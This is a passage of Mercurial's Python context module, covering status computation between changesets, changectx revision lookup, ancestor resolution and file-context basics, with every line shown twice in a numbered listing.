100 return match
101
101
102 def _buildstatus(self, other, s, match, listignored, listclean,
102 def _buildstatus(self, other, s, match, listignored, listclean,
103 listunknown):
103 listunknown):
104 """build a status with respect to another context"""
104 """build a status with respect to another context"""
105 # Load earliest manifest first for caching reasons. More specifically,
105 # Load earliest manifest first for caching reasons. More specifically,
106 # if you have revisions 1000 and 1001, 1001 is probably stored as a
106 # if you have revisions 1000 and 1001, 1001 is probably stored as a
107 # delta against 1000. Thus, if you read 1000 first, we'll reconstruct
107 # delta against 1000. Thus, if you read 1000 first, we'll reconstruct
108 # 1000 and cache it so that when you read 1001, we just need to apply a
108 # 1000 and cache it so that when you read 1001, we just need to apply a
109 # delta to what's in the cache. So that's one full reconstruction + one
109 # delta to what's in the cache. So that's one full reconstruction + one
110 # delta application.
110 # delta application.
111 mf2 = None
111 mf2 = None
112 if self.rev() is not None and self.rev() < other.rev():
112 if self.rev() is not None and self.rev() < other.rev():
113 mf2 = self._buildstatusmanifest(s)
113 mf2 = self._buildstatusmanifest(s)
114 mf1 = other._buildstatusmanifest(s)
114 mf1 = other._buildstatusmanifest(s)
115 if mf2 is None:
115 if mf2 is None:
116 mf2 = self._buildstatusmanifest(s)
116 mf2 = self._buildstatusmanifest(s)
117
117
118 modified, added = [], []
118 modified, added = [], []
119 removed = []
119 removed = []
120 clean = []
120 clean = []
121 deleted, unknown, ignored = s.deleted, s.unknown, s.ignored
121 deleted, unknown, ignored = s.deleted, s.unknown, s.ignored
122 deletedset = set(deleted)
122 deletedset = set(deleted)
123 d = mf1.diff(mf2, match=match, clean=listclean)
123 d = mf1.diff(mf2, match=match, clean=listclean)
124 for fn, value in d.iteritems():
124 for fn, value in d.iteritems():
125 if fn in deletedset:
125 if fn in deletedset:
126 continue
126 continue
127 if value is None:
127 if value is None:
128 clean.append(fn)
128 clean.append(fn)
129 continue
129 continue
130 (node1, flag1), (node2, flag2) = value
130 (node1, flag1), (node2, flag2) = value
131 if node1 is None:
131 if node1 is None:
132 added.append(fn)
132 added.append(fn)
133 elif node2 is None:
133 elif node2 is None:
134 removed.append(fn)
134 removed.append(fn)
135 elif flag1 != flag2:
135 elif flag1 != flag2:
136 modified.append(fn)
136 modified.append(fn)
137 elif node2 not in wdirfilenodeids:
137 elif node2 not in wdirfilenodeids:
138 # When comparing files between two commits, we save time by
138 # When comparing files between two commits, we save time by
139 # not comparing the file contents when the nodeids differ.
139 # not comparing the file contents when the nodeids differ.
140 # Note that this means we incorrectly report a reverted change
140 # Note that this means we incorrectly report a reverted change
141 # to a file as a modification.
141 # to a file as a modification.
142 modified.append(fn)
142 modified.append(fn)
143 elif self[fn].cmp(other[fn]):
143 elif self[fn].cmp(other[fn]):
144 modified.append(fn)
144 modified.append(fn)
145 else:
145 else:
146 clean.append(fn)
146 clean.append(fn)
147
147
148 if removed:
148 if removed:
149 # need to filter files if they are already reported as removed
149 # need to filter files if they are already reported as removed
150 unknown = [fn for fn in unknown if fn not in mf1 and
150 unknown = [fn for fn in unknown if fn not in mf1 and
151 (not match or match(fn))]
151 (not match or match(fn))]
152 ignored = [fn for fn in ignored if fn not in mf1 and
152 ignored = [fn for fn in ignored if fn not in mf1 and
153 (not match or match(fn))]
153 (not match or match(fn))]
154 # if they're deleted, don't report them as removed
154 # if they're deleted, don't report them as removed
155 removed = [fn for fn in removed if fn not in deletedset]
155 removed = [fn for fn in removed if fn not in deletedset]
156
156
157 return scmutil.status(modified, added, removed, deleted, unknown,
157 return scmutil.status(modified, added, removed, deleted, unknown,
158 ignored, clean)
158 ignored, clean)
159
159
160 @propertycache
160 @propertycache
161 def substate(self):
161 def substate(self):
162 return subrepoutil.state(self, self._repo.ui)
162 return subrepoutil.state(self, self._repo.ui)
163
163
164 def subrev(self, subpath):
164 def subrev(self, subpath):
165 return self.substate[subpath][1]
165 return self.substate[subpath][1]
166
166
167 def rev(self):
167 def rev(self):
168 return self._rev
168 return self._rev
169 def node(self):
169 def node(self):
170 return self._node
170 return self._node
171 def hex(self):
171 def hex(self):
172 return hex(self.node())
172 return hex(self.node())
173 def manifest(self):
173 def manifest(self):
174 return self._manifest
174 return self._manifest
175 def manifestctx(self):
175 def manifestctx(self):
176 return self._manifestctx
176 return self._manifestctx
177 def repo(self):
177 def repo(self):
178 return self._repo
178 return self._repo
179 def phasestr(self):
179 def phasestr(self):
180 return phases.phasenames[self.phase()]
180 return phases.phasenames[self.phase()]
181 def mutable(self):
181 def mutable(self):
182 return self.phase() > phases.public
182 return self.phase() > phases.public
183
183
184 def getfileset(self, expr):
184 def getfileset(self, expr):
185 return fileset.getfileset(self, expr)
185 return fileset.getfileset(self, expr)
186
186
187 def obsolete(self):
187 def obsolete(self):
188 """True if the changeset is obsolete"""
188 """True if the changeset is obsolete"""
189 return self.rev() in obsmod.getrevs(self._repo, 'obsolete')
189 return self.rev() in obsmod.getrevs(self._repo, 'obsolete')
190
190
191 def extinct(self):
191 def extinct(self):
192 """True if the changeset is extinct"""
192 """True if the changeset is extinct"""
193 return self.rev() in obsmod.getrevs(self._repo, 'extinct')
193 return self.rev() in obsmod.getrevs(self._repo, 'extinct')
194
194
195 def orphan(self):
195 def orphan(self):
196 """True if the changeset is not obsolete but it's ancestor are"""
196 """True if the changeset is not obsolete but it's ancestor are"""
197 return self.rev() in obsmod.getrevs(self._repo, 'orphan')
197 return self.rev() in obsmod.getrevs(self._repo, 'orphan')
198
198
199 def phasedivergent(self):
199 def phasedivergent(self):
200 """True if the changeset try to be a successor of a public changeset
200 """True if the changeset try to be a successor of a public changeset
201
201
202 Only non-public and non-obsolete changesets may be bumped.
202 Only non-public and non-obsolete changesets may be bumped.
203 """
203 """
204 return self.rev() in obsmod.getrevs(self._repo, 'phasedivergent')
204 return self.rev() in obsmod.getrevs(self._repo, 'phasedivergent')
205
205
206 def contentdivergent(self):
206 def contentdivergent(self):
207 """Is a successors of a changeset with multiple possible successors set
207 """Is a successors of a changeset with multiple possible successors set
208
208
209 Only non-public and non-obsolete changesets may be divergent.
209 Only non-public and non-obsolete changesets may be divergent.
210 """
210 """
211 return self.rev() in obsmod.getrevs(self._repo, 'contentdivergent')
211 return self.rev() in obsmod.getrevs(self._repo, 'contentdivergent')
212
212
213 def isunstable(self):
213 def isunstable(self):
214 """True if the changeset is either unstable, bumped or divergent"""
214 """True if the changeset is either unstable, bumped or divergent"""
215 return self.orphan() or self.phasedivergent() or self.contentdivergent()
215 return self.orphan() or self.phasedivergent() or self.contentdivergent()
216
216
217 def instabilities(self):
217 def instabilities(self):
218 """return the list of instabilities affecting this changeset.
218 """return the list of instabilities affecting this changeset.
219
219
220 Instabilities are returned as strings. possible values are:
220 Instabilities are returned as strings. possible values are:
221 - orphan,
221 - orphan,
222 - phase-divergent,
222 - phase-divergent,
223 - content-divergent.
223 - content-divergent.
224 """
224 """
225 instabilities = []
225 instabilities = []
226 if self.orphan():
226 if self.orphan():
227 instabilities.append('orphan')
227 instabilities.append('orphan')
228 if self.phasedivergent():
228 if self.phasedivergent():
229 instabilities.append('phase-divergent')
229 instabilities.append('phase-divergent')
230 if self.contentdivergent():
230 if self.contentdivergent():
231 instabilities.append('content-divergent')
231 instabilities.append('content-divergent')
232 return instabilities
232 return instabilities
233
233
234 def parents(self):
234 def parents(self):
235 """return contexts for each parent changeset"""
235 """return contexts for each parent changeset"""
236 return self._parents
236 return self._parents
237
237
238 def p1(self):
238 def p1(self):
239 return self._parents[0]
239 return self._parents[0]
240
240
241 def p2(self):
241 def p2(self):
242 parents = self._parents
242 parents = self._parents
243 if len(parents) == 2:
243 if len(parents) == 2:
244 return parents[1]
244 return parents[1]
245 return changectx(self._repo, nullrev)
245 return changectx(self._repo, nullrev)
246
246
247 def _fileinfo(self, path):
247 def _fileinfo(self, path):
248 if r'_manifest' in self.__dict__:
248 if r'_manifest' in self.__dict__:
249 try:
249 try:
250 return self._manifest[path], self._manifest.flags(path)
250 return self._manifest[path], self._manifest.flags(path)
251 except KeyError:
251 except KeyError:
252 raise error.ManifestLookupError(self._node, path,
252 raise error.ManifestLookupError(self._node, path,
253 _('not found in manifest'))
253 _('not found in manifest'))
254 if r'_manifestdelta' in self.__dict__ or path in self.files():
254 if r'_manifestdelta' in self.__dict__ or path in self.files():
255 if path in self._manifestdelta:
255 if path in self._manifestdelta:
256 return (self._manifestdelta[path],
256 return (self._manifestdelta[path],
257 self._manifestdelta.flags(path))
257 self._manifestdelta.flags(path))
258 mfl = self._repo.manifestlog
258 mfl = self._repo.manifestlog
259 try:
259 try:
260 node, flag = mfl[self._changeset.manifest].find(path)
260 node, flag = mfl[self._changeset.manifest].find(path)
261 except KeyError:
261 except KeyError:
262 raise error.ManifestLookupError(self._node, path,
262 raise error.ManifestLookupError(self._node, path,
263 _('not found in manifest'))
263 _('not found in manifest'))
264
264
265 return node, flag
265 return node, flag
266
266
267 def filenode(self, path):
267 def filenode(self, path):
268 return self._fileinfo(path)[0]
268 return self._fileinfo(path)[0]
269
269
270 def flags(self, path):
270 def flags(self, path):
271 try:
271 try:
272 return self._fileinfo(path)[1]
272 return self._fileinfo(path)[1]
273 except error.LookupError:
273 except error.LookupError:
274 return ''
274 return ''
275
275
276 def sub(self, path, allowcreate=True):
276 def sub(self, path, allowcreate=True):
277 '''return a subrepo for the stored revision of path, never wdir()'''
277 '''return a subrepo for the stored revision of path, never wdir()'''
278 return subrepo.subrepo(self, path, allowcreate=allowcreate)
278 return subrepo.subrepo(self, path, allowcreate=allowcreate)
279
279
280 def nullsub(self, path, pctx):
280 def nullsub(self, path, pctx):
281 return subrepo.nullsubrepo(self, path, pctx)
281 return subrepo.nullsubrepo(self, path, pctx)
282
282
283 def workingsub(self, path):
283 def workingsub(self, path):
284 '''return a subrepo for the stored revision, or wdir if this is a wdir
284 '''return a subrepo for the stored revision, or wdir if this is a wdir
285 context.
285 context.
286 '''
286 '''
287 return subrepo.subrepo(self, path, allowwdir=True)
287 return subrepo.subrepo(self, path, allowwdir=True)
288
288
289 def match(self, pats=None, include=None, exclude=None, default='glob',
289 def match(self, pats=None, include=None, exclude=None, default='glob',
290 listsubrepos=False, badfn=None):
290 listsubrepos=False, badfn=None):
291 r = self._repo
291 r = self._repo
292 return matchmod.match(r.root, r.getcwd(), pats,
292 return matchmod.match(r.root, r.getcwd(), pats,
293 include, exclude, default,
293 include, exclude, default,
294 auditor=r.nofsauditor, ctx=self,
294 auditor=r.nofsauditor, ctx=self,
295 listsubrepos=listsubrepos, badfn=badfn)
295 listsubrepos=listsubrepos, badfn=badfn)
296
296
297 def diff(self, ctx2=None, match=None, **opts):
297 def diff(self, ctx2=None, match=None, **opts):
298 """Returns a diff generator for the given contexts and matcher"""
298 """Returns a diff generator for the given contexts and matcher"""
299 if ctx2 is None:
299 if ctx2 is None:
300 ctx2 = self.p1()
300 ctx2 = self.p1()
301 if ctx2 is not None:
301 if ctx2 is not None:
302 ctx2 = self._repo[ctx2]
302 ctx2 = self._repo[ctx2]
303 diffopts = patch.diffopts(self._repo.ui, pycompat.byteskwargs(opts))
303 diffopts = patch.diffopts(self._repo.ui, pycompat.byteskwargs(opts))
304 return patch.diff(self._repo, ctx2, self, match=match, opts=diffopts)
304 return patch.diff(self._repo, ctx2, self, match=match, opts=diffopts)
305
305
306 def dirs(self):
306 def dirs(self):
307 return self._manifest.dirs()
307 return self._manifest.dirs()
308
308
309 def hasdir(self, dir):
309 def hasdir(self, dir):
310 return self._manifest.hasdir(dir)
310 return self._manifest.hasdir(dir)
311
311
312 def status(self, other=None, match=None, listignored=False,
312 def status(self, other=None, match=None, listignored=False,
313 listclean=False, listunknown=False, listsubrepos=False):
313 listclean=False, listunknown=False, listsubrepos=False):
314 """return status of files between two nodes or node and working
314 """return status of files between two nodes or node and working
315 directory.
315 directory.
316
316
317 If other is None, compare this node with working directory.
317 If other is None, compare this node with working directory.
318
318
319 returns (modified, added, removed, deleted, unknown, ignored, clean)
319 returns (modified, added, removed, deleted, unknown, ignored, clean)
320 """
320 """
321
321
322 ctx1 = self
322 ctx1 = self
323 ctx2 = self._repo[other]
323 ctx2 = self._repo[other]
324
324
325 # This next code block is, admittedly, fragile logic that tests for
325 # This next code block is, admittedly, fragile logic that tests for
326 # reversing the contexts and wouldn't need to exist if it weren't for
326 # reversing the contexts and wouldn't need to exist if it weren't for
327 # the fast (and common) code path of comparing the working directory
327 # the fast (and common) code path of comparing the working directory
328 # with its first parent.
328 # with its first parent.
329 #
329 #
330 # What we're aiming for here is the ability to call:
330 # What we're aiming for here is the ability to call:
331 #
331 #
332 # workingctx.status(parentctx)
332 # workingctx.status(parentctx)
333 #
333 #
334 # If we always built the manifest for each context and compared those,
334 # If we always built the manifest for each context and compared those,
335 # then we'd be done. But the special case of the above call means we
335 # then we'd be done. But the special case of the above call means we
336 # just copy the manifest of the parent.
336 # just copy the manifest of the parent.
337 reversed = False
337 reversed = False
338 if (not isinstance(ctx1, changectx)
338 if (not isinstance(ctx1, changectx)
339 and isinstance(ctx2, changectx)):
339 and isinstance(ctx2, changectx)):
340 reversed = True
340 reversed = True
341 ctx1, ctx2 = ctx2, ctx1
341 ctx1, ctx2 = ctx2, ctx1
342
342
343 match = match or matchmod.always(self._repo.root, self._repo.getcwd())
343 match = match or matchmod.always(self._repo.root, self._repo.getcwd())
344 match = ctx2._matchstatus(ctx1, match)
344 match = ctx2._matchstatus(ctx1, match)
345 r = scmutil.status([], [], [], [], [], [], [])
345 r = scmutil.status([], [], [], [], [], [], [])
346 r = ctx2._buildstatus(ctx1, r, match, listignored, listclean,
346 r = ctx2._buildstatus(ctx1, r, match, listignored, listclean,
347 listunknown)
347 listunknown)
348
348
349 if reversed:
349 if reversed:
350 # Reverse added and removed. Clear deleted, unknown and ignored as
350 # Reverse added and removed. Clear deleted, unknown and ignored as
351 # these make no sense to reverse.
351 # these make no sense to reverse.
352 r = scmutil.status(r.modified, r.removed, r.added, [], [], [],
352 r = scmutil.status(r.modified, r.removed, r.added, [], [], [],
353 r.clean)
353 r.clean)
354
354
355 if listsubrepos:
355 if listsubrepos:
356 for subpath, sub in scmutil.itersubrepos(ctx1, ctx2):
356 for subpath, sub in scmutil.itersubrepos(ctx1, ctx2):
357 try:
357 try:
358 rev2 = ctx2.subrev(subpath)
358 rev2 = ctx2.subrev(subpath)
359 except KeyError:
359 except KeyError:
360 # A subrepo that existed in node1 was deleted between
360 # A subrepo that existed in node1 was deleted between
361 # node1 and node2 (inclusive). Thus, ctx2's substate
361 # node1 and node2 (inclusive). Thus, ctx2's substate
362 # won't contain that subpath. The best we can do ignore it.
362 # won't contain that subpath. The best we can do ignore it.
363 rev2 = None
363 rev2 = None
364 submatch = matchmod.subdirmatcher(subpath, match)
364 submatch = matchmod.subdirmatcher(subpath, match)
365 s = sub.status(rev2, match=submatch, ignored=listignored,
365 s = sub.status(rev2, match=submatch, ignored=listignored,
366 clean=listclean, unknown=listunknown,
366 clean=listclean, unknown=listunknown,
367 listsubrepos=True)
367 listsubrepos=True)
368 for rfiles, sfiles in zip(r, s):
368 for rfiles, sfiles in zip(r, s):
369 rfiles.extend("%s/%s" % (subpath, f) for f in sfiles)
369 rfiles.extend("%s/%s" % (subpath, f) for f in sfiles)
370
370
371 for l in r:
371 for l in r:
372 l.sort()
372 l.sort()
373
373
374 return r
374 return r
375
375
376 class changectx(basectx):
376 class changectx(basectx):
377 """A changecontext object makes access to data related to a particular
377 """A changecontext object makes access to data related to a particular
378 changeset convenient. It represents a read-only context already present in
378 changeset convenient. It represents a read-only context already present in
379 the repo."""
379 the repo."""
380 def __init__(self, repo, changeid='.'):
380 def __init__(self, repo, changeid='.'):
381 """changeid is a revision number, node, or tag"""
381 """changeid is a revision number, node, or tag"""
382 super(changectx, self).__init__(repo)
382 super(changectx, self).__init__(repo)
383
383
384 try:
384 try:
385 if isinstance(changeid, int):
385 if isinstance(changeid, int):
386 self._node = repo.changelog.node(changeid)
386 self._node = repo.changelog.node(changeid)
387 self._rev = changeid
387 self._rev = changeid
388 return
388 return
389 elif changeid == 'null':
389 elif changeid == 'null':
390 self._node = nullid
390 self._node = nullid
391 self._rev = nullrev
391 self._rev = nullrev
392 return
392 return
393 elif changeid == 'tip':
393 elif changeid == 'tip':
394 self._node = repo.changelog.tip()
394 self._node = repo.changelog.tip()
395 self._rev = repo.changelog.rev(self._node)
395 self._rev = repo.changelog.rev(self._node)
396 return
396 return
397 elif (changeid == '.'
397 elif (changeid == '.'
398 or repo.local() and changeid == repo.dirstate.p1()):
398 or repo.local() and changeid == repo.dirstate.p1()):
399 # this is a hack to delay/avoid loading obsmarkers
399 # this is a hack to delay/avoid loading obsmarkers
400 # when we know that '.' won't be hidden
400 # when we know that '.' won't be hidden
401 self._node = repo.dirstate.p1()
401 self._node = repo.dirstate.p1()
402 self._rev = repo.unfiltered().changelog.rev(self._node)
402 self._rev = repo.unfiltered().changelog.rev(self._node)
403 return
403 return
404 elif len(changeid) == 20:
404 elif len(changeid) == 20:
405 try:
405 try:
406 self._node = changeid
406 self._node = changeid
407 self._rev = repo.changelog.rev(changeid)
407 self._rev = repo.changelog.rev(changeid)
408 return
408 return
409 except error.FilteredLookupError:
409 except error.FilteredLookupError:
410 raise
410 raise
411 except LookupError:
411 except LookupError:
412 # check if it might have come from damaged dirstate
412 # check if it might have come from damaged dirstate
413 #
413 #
414 # XXX we could avoid the unfiltered if we had a recognizable
414 # XXX we could avoid the unfiltered if we had a recognizable
415 # exception for filtered changeset access
415 # exception for filtered changeset access
416 if (repo.local()
416 if (repo.local()
417 and changeid in repo.unfiltered().dirstate.parents()):
417 and changeid in repo.unfiltered().dirstate.parents()):
418 msg = _("working directory has unknown parent '%s'!")
418 msg = _("working directory has unknown parent '%s'!")
419 raise error.Abort(msg % short(changeid))
419 raise error.Abort(msg % short(changeid))
420 changeid = hex(changeid) # for the error message
420 changeid = hex(changeid) # for the error message
421
421
422 elif len(changeid) == 40:
422 elif len(changeid) == 40:
423 try:
423 try:
424 self._node = bin(changeid)
424 self._node = bin(changeid)
425 self._rev = repo.changelog.rev(self._node)
425 self._rev = repo.changelog.rev(self._node)
426 return
426 return
427 except error.FilteredLookupError:
427 except error.FilteredLookupError:
428 raise
428 raise
429 except (TypeError, LookupError):
429 except (TypeError, LookupError):
430 pass
430 pass
431
431
432 # lookup failed
432 # lookup failed
433 except (error.FilteredIndexError, error.FilteredLookupError):
433 except (error.FilteredIndexError, error.FilteredLookupError):
434 raise error.FilteredRepoLookupError(_("filtered revision '%s'")
434 raise error.FilteredRepoLookupError(_("filtered revision '%s'")
435 % pycompat.bytestr(changeid))
435 % pycompat.bytestr(changeid))
436 except error.FilteredRepoLookupError:
436 except error.FilteredRepoLookupError:
437 raise
437 raise
438 except IndexError:
438 except IndexError:
439 pass
439 pass
440 raise error.RepoLookupError(
440 raise error.RepoLookupError(
441 _("unknown revision '%s'") % changeid)
441 _("unknown revision '%s'") % changeid)
442
442
443 def __hash__(self):
443 def __hash__(self):
444 try:
444 try:
445 return hash(self._rev)
445 return hash(self._rev)
446 except AttributeError:
446 except AttributeError:
447 return id(self)
447 return id(self)
448
448
449 def __nonzero__(self):
449 def __nonzero__(self):
450 return self._rev != nullrev
450 return self._rev != nullrev
451
451
452 __bool__ = __nonzero__
452 __bool__ = __nonzero__
453
453
454 @propertycache
454 @propertycache
455 def _changeset(self):
455 def _changeset(self):
456 return self._repo.changelog.changelogrevision(self.rev())
456 return self._repo.changelog.changelogrevision(self.rev())
457
457
458 @propertycache
458 @propertycache
459 def _manifest(self):
459 def _manifest(self):
460 return self._manifestctx.read()
460 return self._manifestctx.read()
461
461
462 @property
462 @property
463 def _manifestctx(self):
463 def _manifestctx(self):
464 return self._repo.manifestlog[self._changeset.manifest]
464 return self._repo.manifestlog[self._changeset.manifest]
465
465
466 @propertycache
466 @propertycache
467 def _manifestdelta(self):
467 def _manifestdelta(self):
468 return self._manifestctx.readdelta()
468 return self._manifestctx.readdelta()
469
469
470 @propertycache
470 @propertycache
471 def _parents(self):
471 def _parents(self):
472 repo = self._repo
472 repo = self._repo
473 p1, p2 = repo.changelog.parentrevs(self._rev)
473 p1, p2 = repo.changelog.parentrevs(self._rev)
474 if p2 == nullrev:
474 if p2 == nullrev:
475 return [changectx(repo, p1)]
475 return [changectx(repo, p1)]
476 return [changectx(repo, p1), changectx(repo, p2)]
476 return [changectx(repo, p1), changectx(repo, p2)]
477
477
478 def changeset(self):
478 def changeset(self):
479 c = self._changeset
479 c = self._changeset
480 return (
480 return (
481 c.manifest,
481 c.manifest,
482 c.user,
482 c.user,
483 c.date,
483 c.date,
484 c.files,
484 c.files,
485 c.description,
485 c.description,
486 c.extra,
486 c.extra,
487 )
487 )
488 def manifestnode(self):
488 def manifestnode(self):
489 return self._changeset.manifest
489 return self._changeset.manifest
490
490
491 def user(self):
491 def user(self):
492 return self._changeset.user
492 return self._changeset.user
493 def date(self):
493 def date(self):
494 return self._changeset.date
494 return self._changeset.date
495 def files(self):
495 def files(self):
496 return self._changeset.files
496 return self._changeset.files
497 def description(self):
497 def description(self):
498 return self._changeset.description
498 return self._changeset.description
499 def branch(self):
499 def branch(self):
500 return encoding.tolocal(self._changeset.extra.get("branch"))
500 return encoding.tolocal(self._changeset.extra.get("branch"))
501 def closesbranch(self):
501 def closesbranch(self):
502 return 'close' in self._changeset.extra
502 return 'close' in self._changeset.extra
503 def extra(self):
503 def extra(self):
504 """Return a dict of extra information."""
504 """Return a dict of extra information."""
505 return self._changeset.extra
505 return self._changeset.extra
506 def tags(self):
506 def tags(self):
507 """Return a list of byte tag names"""
507 """Return a list of byte tag names"""
508 return self._repo.nodetags(self._node)
508 return self._repo.nodetags(self._node)
509 def bookmarks(self):
509 def bookmarks(self):
510 """Return a list of byte bookmark names."""
510 """Return a list of byte bookmark names."""
511 return self._repo.nodebookmarks(self._node)
511 return self._repo.nodebookmarks(self._node)
512 def phase(self):
512 def phase(self):
513 return self._repo._phasecache.phase(self._repo, self._rev)
513 return self._repo._phasecache.phase(self._repo, self._rev)
514 def hidden(self):
514 def hidden(self):
515 return self._rev in repoview.filterrevs(self._repo, 'visible')
515 return self._rev in repoview.filterrevs(self._repo, 'visible')
516
516
517 def isinmemory(self):
517 def isinmemory(self):
518 return False
518 return False
519
519
520 def children(self):
520 def children(self):
521 """return list of changectx contexts for each child changeset.
521 """return list of changectx contexts for each child changeset.
522
522
523 This returns only the immediate child changesets. Use descendants() to
523 This returns only the immediate child changesets. Use descendants() to
524 recursively walk children.
524 recursively walk children.
525 """
525 """
526 c = self._repo.changelog.children(self._node)
526 c = self._repo.changelog.children(self._node)
527 return [changectx(self._repo, x) for x in c]
527 return [changectx(self._repo, x) for x in c]
528
528
529 def ancestors(self):
529 def ancestors(self):
530 for a in self._repo.changelog.ancestors([self._rev]):
530 for a in self._repo.changelog.ancestors([self._rev]):
531 yield changectx(self._repo, a)
531 yield changectx(self._repo, a)
532
532
533 def descendants(self):
533 def descendants(self):
534 """Recursively yield all children of the changeset.
534 """Recursively yield all children of the changeset.
535
535
536 For just the immediate children, use children()
536 For just the immediate children, use children()
537 """
537 """
538 for d in self._repo.changelog.descendants([self._rev]):
538 for d in self._repo.changelog.descendants([self._rev]):
539 yield changectx(self._repo, d)
539 yield changectx(self._repo, d)
540
540
541 def filectx(self, path, fileid=None, filelog=None):
541 def filectx(self, path, fileid=None, filelog=None):
542 """get a file context from this changeset"""
542 """get a file context from this changeset"""
543 if fileid is None:
543 if fileid is None:
544 fileid = self.filenode(path)
544 fileid = self.filenode(path)
545 return filectx(self._repo, path, fileid=fileid,
545 return filectx(self._repo, path, fileid=fileid,
546 changectx=self, filelog=filelog)
546 changectx=self, filelog=filelog)
547
547
548 def ancestor(self, c2, warn=False):
548 def ancestor(self, c2, warn=False):
549 """return the "best" ancestor context of self and c2
549 """return the "best" ancestor context of self and c2
550
550
551 If there are multiple candidates, it will show a message and check
551 If there are multiple candidates, it will show a message and check
552 merge.preferancestor configuration before falling back to the
552 merge.preferancestor configuration before falling back to the
553 revlog ancestor."""
553 revlog ancestor."""
554 # deal with workingctxs
554 # deal with workingctxs
555 n2 = c2._node
555 n2 = c2._node
556 if n2 is None:
556 if n2 is None:
557 n2 = c2._parents[0]._node
557 n2 = c2._parents[0]._node
558 cahs = self._repo.changelog.commonancestorsheads(self._node, n2)
558 cahs = self._repo.changelog.commonancestorsheads(self._node, n2)
559 if not cahs:
559 if not cahs:
560 anc = nullid
560 anc = nullid
561 elif len(cahs) == 1:
561 elif len(cahs) == 1:
562 anc = cahs[0]
562 anc = cahs[0]
563 else:
563 else:
564 # experimental config: merge.preferancestor
564 # experimental config: merge.preferancestor
565 for r in self._repo.ui.configlist('merge', 'preferancestor'):
565 for r in self._repo.ui.configlist('merge', 'preferancestor'):
566 try:
566 try:
567 ctx = scmutil.revsymbol(self._repo, r)
567 ctx = scmutil.revsymbol(self._repo, r)
568 except error.RepoLookupError:
568 except error.RepoLookupError:
569 continue
569 continue
570 anc = ctx.node()
570 anc = ctx.node()
571 if anc in cahs:
571 if anc in cahs:
572 break
572 break
573 else:
573 else:
574 anc = self._repo.changelog.ancestor(self._node, n2)
574 anc = self._repo.changelog.ancestor(self._node, n2)
575 if warn:
575 if warn:
576 self._repo.ui.status(
576 self._repo.ui.status(
577 (_("note: using %s as ancestor of %s and %s\n") %
577 (_("note: using %s as ancestor of %s and %s\n") %
578 (short(anc), short(self._node), short(n2))) +
578 (short(anc), short(self._node), short(n2))) +
579 ''.join(_(" alternatively, use --config "
579 ''.join(_(" alternatively, use --config "
580 "merge.preferancestor=%s\n") %
580 "merge.preferancestor=%s\n") %
581 short(n) for n in sorted(cahs) if n != anc))
581 short(n) for n in sorted(cahs) if n != anc))
582 return changectx(self._repo, anc)
582 return changectx(self._repo, anc)
583
583
584 def descendant(self, other):
584 def descendant(self, other):
585 """True if other is descendant of this changeset"""
585 """True if other is descendant of this changeset"""
586 return self._repo.changelog.descendant(self._rev, other._rev)
586 return self._repo.changelog.descendant(self._rev, other._rev)
587
587
588 def walk(self, match):
588 def walk(self, match):
589 '''Generates matching file names.'''
589 '''Generates matching file names.'''
590
590
591 # Wrap match.bad method to have message with nodeid
591 # Wrap match.bad method to have message with nodeid
592 def bad(fn, msg):
592 def bad(fn, msg):
593 # The manifest doesn't know about subrepos, so don't complain about
593 # The manifest doesn't know about subrepos, so don't complain about
594 # paths into valid subrepos.
594 # paths into valid subrepos.
595 if any(fn == s or fn.startswith(s + '/')
595 if any(fn == s or fn.startswith(s + '/')
596 for s in self.substate):
596 for s in self.substate):
597 return
597 return
598 match.bad(fn, _('no such file in rev %s') % self)
598 match.bad(fn, _('no such file in rev %s') % self)
599
599
600 m = matchmod.badmatch(match, bad)
600 m = matchmod.badmatch(match, bad)
601 return self._manifest.walk(m)
601 return self._manifest.walk(m)
602
602
603 def matches(self, match):
603 def matches(self, match):
604 return self.walk(match)
604 return self.walk(match)
605
605
606 class basefilectx(object):
606 class basefilectx(object):
607 """A filecontext object represents the common logic for its children:
607 """A filecontext object represents the common logic for its children:
608 filectx: read-only access to a filerevision that is already present
608 filectx: read-only access to a filerevision that is already present
609 in the repo,
609 in the repo,
610 workingfilectx: a filecontext that represents files from the working
610 workingfilectx: a filecontext that represents files from the working
611 directory,
611 directory,
612 memfilectx: a filecontext that represents files in-memory,
612 memfilectx: a filecontext that represents files in-memory,
613 overlayfilectx: duplicate another filecontext with some fields overridden.
613 overlayfilectx: duplicate another filecontext with some fields overridden.
614 """
614 """
615 @propertycache
615 @propertycache
616 def _filelog(self):
616 def _filelog(self):
617 return self._repo.file(self._path)
617 return self._repo.file(self._path)
618
618
619 @propertycache
619 @propertycache
620 def _changeid(self):
620 def _changeid(self):
621 if r'_changeid' in self.__dict__:
621 if r'_changeid' in self.__dict__:
622 return self._changeid
622 return self._changeid
623 elif r'_changectx' in self.__dict__:
623 elif r'_changectx' in self.__dict__:
624 return self._changectx.rev()
624 return self._changectx.rev()
625 elif r'_descendantrev' in self.__dict__:
625 elif r'_descendantrev' in self.__dict__:
626 # this file context was created from a revision with a known
626 # this file context was created from a revision with a known
627 # descendant, we can (lazily) correct for linkrev aliases
627 # descendant, we can (lazily) correct for linkrev aliases
628 return self._adjustlinkrev(self._descendantrev)
628 return self._adjustlinkrev(self._descendantrev)
629 else:
629 else:
630 return self._filelog.linkrev(self._filerev)
630 return self._filelog.linkrev(self._filerev)
631
631
632 @propertycache
632 @propertycache
633 def _filenode(self):
633 def _filenode(self):
634 if r'_fileid' in self.__dict__:
634 if r'_fileid' in self.__dict__:
635 return self._filelog.lookup(self._fileid)
635 return self._filelog.lookup(self._fileid)
636 else:
636 else:
637 return self._changectx.filenode(self._path)
637 return self._changectx.filenode(self._path)
638
638
639 @propertycache
639 @propertycache
640 def _filerev(self):
640 def _filerev(self):
641 return self._filelog.rev(self._filenode)
641 return self._filelog.rev(self._filenode)
642
642
643 @propertycache
643 @propertycache
644 def _repopath(self):
644 def _repopath(self):
645 return self._path
645 return self._path
646
646
647 def __nonzero__(self):
647 def __nonzero__(self):
648 try:
648 try:
649 self._filenode
649 self._filenode
650 return True
650 return True
651 except error.LookupError:
651 except error.LookupError:
652 # file is missing
652 # file is missing
653 return False
653 return False
654
654
655 __bool__ = __nonzero__
655 __bool__ = __nonzero__
656
656
657 def __bytes__(self):
657 def __bytes__(self):
658 try:
658 try:
659 return "%s@%s" % (self.path(), self._changectx)
659 return "%s@%s" % (self.path(), self._changectx)
660 except error.LookupError:
660 except error.LookupError:
661 return "%s@???" % self.path()
661 return "%s@???" % self.path()
662
662
663 __str__ = encoding.strmethod(__bytes__)
663 __str__ = encoding.strmethod(__bytes__)
664
664
665 def __repr__(self):
665 def __repr__(self):
666 return r"<%s %s>" % (type(self).__name__, str(self))
